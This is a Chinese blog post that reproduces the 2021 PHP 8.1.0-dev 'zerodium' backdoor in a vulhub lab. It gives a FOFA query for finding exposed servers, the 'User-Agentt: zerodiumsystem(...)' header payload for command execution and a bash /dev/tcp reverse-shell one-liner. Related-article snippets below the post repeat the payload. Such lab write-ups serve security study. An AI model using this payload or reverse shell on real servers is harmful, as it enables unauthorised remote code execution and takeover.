PHP zerodium后门漏洞

最新推荐文章于 2024-05-20 23:24:51 发布
最新推荐文章于 2024-05-20 23:24:51 发布
阅读量6.9k 收藏 5
点赞数 4
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44159028/article/details/116992989
版权

目录

一. 漏洞概述

二. 漏洞影响

三. 漏洞复现

一. 漏洞概述

PHP开发工程师Jake Birchall在对其中一个恶意COMMIT的分析过程中发现,在代码中注入的后门是来自一个PHP代码被劫持的网站上,并且采用了远程代码执行的操作,并且攻击者盗用了PHP开发人员的名义来提交此COMMIT。

目前为止PHP官方并未就该事件进行更多披露,表示此次服务器被黑的具体细节仍在调查当中。由于此事件的影响,PHP的官方代码库已经被维护人员迁移至GitHub平台,之后的相关代码更新、修改将会都在GitHub上进行。

二. 漏洞影响

  • PHP 8.1.0-dev

三. 漏洞复现

FOFA搜索:

"PHP/8.1.0-dev"

1. 环境搭建

利用vulhub搭建环境,进入/vulhub-master/php/8.1-backdoor中,执行docker-compose up -d启动环境,访问8080

2. 文件读取

后门为添加请求头

User-Agentt: zerodiumsystem('id');

3. 反弹shell

可以执行命令,那我们就可以进行反弹shell了

linux下反弹shell的语句

bash -c 'exec bash -i &>/dev/tcp/ip/端口 <&1'


 

百事都可樂~
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
蚁剑连接php3,蚁剑xss漏洞,获取者shell
weixin_39654465的博客
03-10 1083
今日在github上看到蚁剑暴露了一个xss漏洞,自己也经常使用蚁剑。同时在freebuf上也有一篇文章,关于蚁剑漏洞的。闲着没事测试了一波。一、漏洞成因蚁剑shell远程连接失败时,蚁剑会返回错误信息,但因为使用的是html解析,导致xss漏洞。用过蚁剑的童靴都清楚,当我们远程连接写好的webshell的时候,有时候可能因为shell书写错误或者链接填写不当的时候,会出现大堆的错误代码。该信息并...
phpStudy backdoor 2019后门漏洞复现过程记录
牛奶栗的小博客
11-11 902
1)可以通过查看路径为PHPTutorial/php/php-5.4.45/ext/php_xmlrpc.dll的文件,查找到@eval(%s('%s'));4、打开Burpsuite抓phpinfo.php页面的请求包,发送到Repeater重放器模块。部署在win10虚拟机里,解压后运行后访问localhost/phpinfo.php即成功安装。3)查看php.ini文件,检索到extension=php_xmlrpc.dll。2)查看php探针→PHP已编译模块检测,存在xmlrpc。
PHP 的 Git 服务器被黑客入侵,源码库将永久迁移至 GitHub!
热门推荐
CSDN资讯
03-30 1万+
整理 | 郑丽媛 出品 | CSDN(ID:CSDNnews) 作为在服务器端执行的脚本语言,PHP 尤为适用于 Web 开发并可嵌入 HTML 中,因此许多个人和企业网站的开发都习惯了 PHP 的便捷。 可近日,PHP 官方 Git 仓库却被黑客攻击,致代码库遭篡改,恶意代码植入了一个远程代码执行的后门,即黑客可远程接管任何使用 PHP 的网站! 两个冒名的恶意提交 上周日,PHP 的开发者兼维护者 Nikita Popov 表示,在 git.php.net 服务器上维护的 php-src 存储库中发.
PHP 8.1.0-dev后门复现
weixin_46137328的博客
01-18 1870
0x01 简介PHP verion 8.1.0-dev于2021年3月28日被植入后门,但是后门很快被发现并删除。当受害者使用该后门PHP代码时,攻击者可以通过修改User-Agent头来...
PHP/8.1.0-dev 后门命令执行漏洞复现
m0_63253040的博客
09-25 1731
题目描述:题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。一开始这里我有个空格在:后面,所以执行不成功,去掉空格就成功了。没有发现什么点,目录扫描也没有结果,打开bp抓包。搜索PHP/8.1.0-dev。
多款家用路由器存后门漏洞.pdf
10-08
多款家用路由器存后门漏洞.pdf
PhpStudy后门漏洞实战复现
la-大白
10-28 4865
phpstudy后门漏洞
RDP shift后门漏洞
qq_54713392的博客
04-20 536
RDP shift后门漏洞 在win7开机过程中,强制关闭计算机,再次开机会出现修复,点启动修复 当它无法修复时会弹出下面的框发送和不发送,这里有查看问题详细信息的按钮 点击该按钮可以看到有一些信息 在信息最下面有个隐私声明的地址 打开这个地址会看到是一个记事本文件,在记事本文件中有文件打开功能 这样我们就进入看到了主机的所有文件,可以进行一些列的工作 这里的D盘实际是主机的C盘 此时它会有一个本地的记事本,可以通过它打开TXT文件。打开Windows->System32文件夹 ,在文件
2021虎符杯web(部分)
羽的博客
04-04 2295
签到 根据提示直接在网上搜新闻。 这个后门代码很简单,它被加到zlib扩展里,当发现请求User-Agentt中包含字符串zerodium时,则用eval执行User-Agent第8位字符后内容。黑客大概是希望传入并执行zerodiumphpinfo();这样的内容。 也就是说zerodiumsystem将会有system函数的功能。 payload: unsetme 在网站上下载下来源码,修改index.php后本地搭建。 开启报错后爆出关键内容 找到代码位置 其中$key为我们传入的a的内容
PHP-8.1.0-dev 后门命令执行漏洞复现
Shadow_DAI_990101的博客
09-08 2553
想必大家都了解,这里就不过多赘述了没啥可说的,是一个无聊的漏洞
php-8.1.0 开发版后门复现
lionwerson的博客
06-02 631
1
2、PHP 8.1.0-dev 后门远程命令执行漏洞复现
最新发布
weixin_51520483的博客
05-20 522
3、bp抓包发现PHP版本为8.1.0-dev。4、尝试使用以前爆出过的漏洞(网上查相关案例)1、青少年ctf,题目PHP后门
CUMTctf web 细心点
m0_56598320的博客
06-01 116
根据提示进行抓包,得到返回包 看出返回包中X-Powered-By: PHP/8.1.0-dev 在进行百度搜索后得到信息 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞利用 使用burp抓包,并加入命令 User-Agentt: zerodiumsystem("id"); 发现被成功执行 接着尝试flag.php是否可被解析执行 得到fla...
最高200万美元,Zerodium悬赏0Day漏洞
weixin_34239592的博客
01-09 345
1月9日,国外漏洞交易平台Zerodium更新了其对0Day漏洞的相关报价,以激励更多人向他们提交发现的漏洞Zerodium安全研究人员称:“通过支付丰富的奖金和酬劳,我们来获取之前从未见到的0Day漏洞设备进行研究和开发。尽管现阶段具备奖励机制的漏洞收集平台不在少数,但这些平台因为集合了包括PoC在内的几乎任何类型的漏洞,其赏金往往少的可怜,相...
青少年CTF、PHP后门PHP/8.1.0-dev漏洞
weixin_69830800的博客
11-15 1965
题目利用了PHP某一开发版本的重大后门,可以利用某写东西进行代码执行。
详细分析PHP源代码后门事件及其供应链安全启示
smellycat000的专栏
03-30 2006
聚焦源代码安全,网罗国内外最新资讯!专栏·供应链安全数字化时代,软件无处不在。软件如同社会中的“虚拟人”,已经成为支撑社会正常运转的最基本元素之一,软件的安全性问题也正在成为当今社会的根...
2021虎符CTF-Web前三题
Y4tacker的博客
04-04 1538
文章目录web签到unset慢慢做管理系统 web 签到 一个最近刚爆出来的php后门,直接一把梭 User-Agentt: zerodiumsystem("cat /flag"); unset 一开始百度搜一下发现是fatfree框架,然后github一瞬间获取源码,本地搭建发现报错嘻嘻 syntax error, unexpected '.', expecting :: (T_PAAMAYIM_NEKUDOTAYIM) [G:\phpstudy_pro\WWW\yyds.top\lib\base.ph
imessage后门漏洞
12-29
iMessage是苹果公司的即时通讯服务,但近日有报道指出iMessage存在后门漏洞。据称,黑客可以利用这一漏洞,通过远程方式访问用户的设备并获取用户的个人信息,甚至可以窃取用户的资金。 这一后门漏洞的存在对用户的隐私安全构成了严重威胁。一旦黑客利用了这一漏洞,用户的个人信息和隐私将可能被泄露,造成无法挽回的损失。因此,苹果公司需要尽快修复并加强iMessage的安全防护措施,确保用户的个人信息不会被滥用。 对于用户来说,也需要提高信息安全意识,避免点击不明链接或下载不明附件,定期更新手机系统和应用程序以及使用安全的密码和身份验证方式。 与此同时,监管部门也需要对iMessage及其他通讯服务进行更加严格的监管,确保这些服务符合相关的安全标准,保护用户的个人信息和隐私不受侵犯。只有各方共同努力,才能有效地遏制后门漏洞的威胁,保障用户的信息安全。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

百事都可樂~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值